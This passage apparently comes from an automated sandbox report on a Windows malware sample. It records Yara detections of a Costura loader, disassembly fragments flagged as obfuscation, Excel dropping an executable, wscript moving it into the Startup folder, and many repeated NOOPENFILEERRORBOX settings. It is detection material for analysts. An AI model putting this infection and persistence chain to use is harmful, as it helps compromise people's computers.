Source: Yara match File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE
Yara detected Costura Assembly Loader
Source: Yara match File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\ProgramData\a.exe Code function: 1_2_00E640C1 push eax; retn 0004h 1_2_00E640C2
Source: C:\ProgramData\a.exe Code function: 1_2_00E642DB pushad ; ret 1_2_00E642DE
Source: C:\ProgramData\a.exe Code function: 1_2_00E64450 push 6C04C257h; ret 1_2_00E64455
Source: C:\ProgramData\a.exe Code function: 1_2_00E6450F push edi; retn 0004h 1_2_00E64512
Source: C:\ProgramData\a.exe Code function: 1_2_00E66940 push 9E4C04C2h; ret 1_2_00E66946
Source: C:\ProgramData\a.exe Code function: 1_2_00E66910 push 9C8C04C2h; ret 1_2_00E6691E
Source: C:\ProgramData\a.exe Code function: 1_2_00E6B168 pushfd ; retn 0004h 1_2_00E6B16A
Source: C:\ProgramData\a.exe Code function: 1_2_00E69C98 pushfd ; ret 1_2_00E69CA6
Source: C:\ProgramData\a.exe Code function: 1_2_00E6FF29 push esp; ret 1_2_00E6FF2E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0541EA3B push 8B0541EBh; retf 13_2_0541EA47
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06900998 pushad ; iretd 13_2_06901631
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0690F6D2 push eax; iretd 13_2_0690F6D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E07F5B push esp; retf 13_2_06E07F5C

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\a.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\a.exe

Boot Survival:

Drops PE files to the startup folder
Source: C:\Windows\SysWOW64\wscript.exe PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\wscript.exe PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
